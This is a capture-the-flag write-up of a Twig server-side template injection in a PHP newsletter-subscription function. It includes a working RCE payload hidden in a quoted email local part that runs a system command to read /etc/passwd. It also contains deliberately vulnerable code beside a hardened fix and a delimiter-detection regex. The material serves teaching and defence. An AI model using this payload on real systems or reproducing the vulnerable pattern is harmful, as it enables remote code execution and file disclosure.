Rating: 5.0
Vulnerable function:
```
public function subscribe(Request $request, MailerInterface $mailer)
{
    $msg = '';
    // Only the address *format* is validated; an RFC-style quoted local part such as
    // "{{ ... }}"@domain still passes FILTER_VALIDATE_EMAIL.
    $email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
    if ($email !== false) {
        // The attacker-controlled local part becomes $name ...
        $name = substr($email, 0, strpos($email, '@'));
        // ... and PHP interpolates it into the Twig template SOURCE, so any Twig
        // syntax it carries is compiled and evaluated instead of being treated as text.
        $content = $this->get('twig')->createTemplate(
            "
            Hello ${name}.
            Thank you for subscribing to our newsletter.
            Regards, VolgaCTF Team
            "
        );
        $mail = (new Email())
            ->from('[email protected]')
            ->to($email)
            ->subject('VolgaCTF Newsletter')
            ->html($content);
        $mailer->send($mail);
        $msg = 'Success';
    } else {
        $msg = 'Invalid email';
    }
    return $this->render('main.twig', ['msg' => $msg]);
}
```
RCE PoC: `email="{{['cat${IFS}/etc/passwd']|filter('system')}}"@your.domain`
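The root cause is that `$name` is spliced into the template source by PHP string interpolation, so Twig compiles whatever the local part of the address contains. The following is an added example, not the challenge's own code, that puts the vulnerable construction beside the fix: keep the template source constant and hand `name` to Twig only as a render variable under autoescaping. It assumes `twig/twig` is installed through Composer (`vendor/autoload.php`); the sample addresses and the harmless `{{7*7}}` probe are constructed, and `hasTemplateDelimiters` is a hypothetical helper for logging or input screening.

```php
<?php
// Added example (not the challenge code). Assumes twig/twig is available via
// Composer's autoloader; the input addresses below are constructed samples.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;

// Mirrors the challenge: validate the address format, then take the local part.
function localPart(string $input): ?string
{
    $email = filter_var($input, FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return null;
    }
    // A quoted local part ("{{7*7}}") is RFC-valid, so it survives this check.
    return substr($email, 0, strpos($email, '@'));
}

// Vulnerable: the name is interpolated into the template SOURCE, so Twig
// delimiters inside it are compiled and evaluated ({$name} behaves like the
// challenge's ${name}).
function greetVulnerable(Environment $twig, string $name): string
{
    $source = "Hello {$name}.\nThank you for subscribing to our newsletter.";
    return $twig->createTemplate($source)->render();
}

// Hardened: the template source is a constant; the name only reaches Twig as a
// render variable, where it is escaped and never parsed as template syntax.
function greetHardened(Environment $twig, string $name): string
{
    $source = "Hello {{ name }}.\nThank you for subscribing to our newsletter.";
    return $twig->createTemplate($source)->render(['name' => $name]);
}

// Hypothetical detection aid for request logs or input screening: flag local
// parts that carry Twig delimiters, which no legitimate address needs.
function hasTemplateDelimiters(string $localPart): bool
{
    return (bool) preg_match('/\{\{|\{%|\{#/', $localPart);
}

$twig = new Environment(new ArrayLoader([]), ['autoescape' => 'html']);

$samples = [
    'alice@example.com',       // benign
    '"{{7*7}}"@example.com',   // harmless probe built like the PoC's quoted local part
];

foreach ($samples as $input) {
    $name = localPart($input);
    if ($name === null) {
        echo "$input: rejected\n";
        continue;
    }
    printf("%-25s flagged=%s\n", $input, hasTemplateDelimiters($name) ? 'yes' : 'no');
    // Vulnerable path evaluates the probe: Hello "49".
    printf("  vulnerable: %s\n", strtok(greetVulnerable($twig, $name), "\n"));
    // Hardened path keeps it inert and escaped: Hello &quot;{{7*7}}&quot;.
    printf("  hardened:   %s\n", strtok(greetHardened($twig, $name), "\n"));
}
```

The hardened variant is the real fix; the delimiter check is only a secondary signal, since the template source must never be built from user input regardless of what a pre-filter catches.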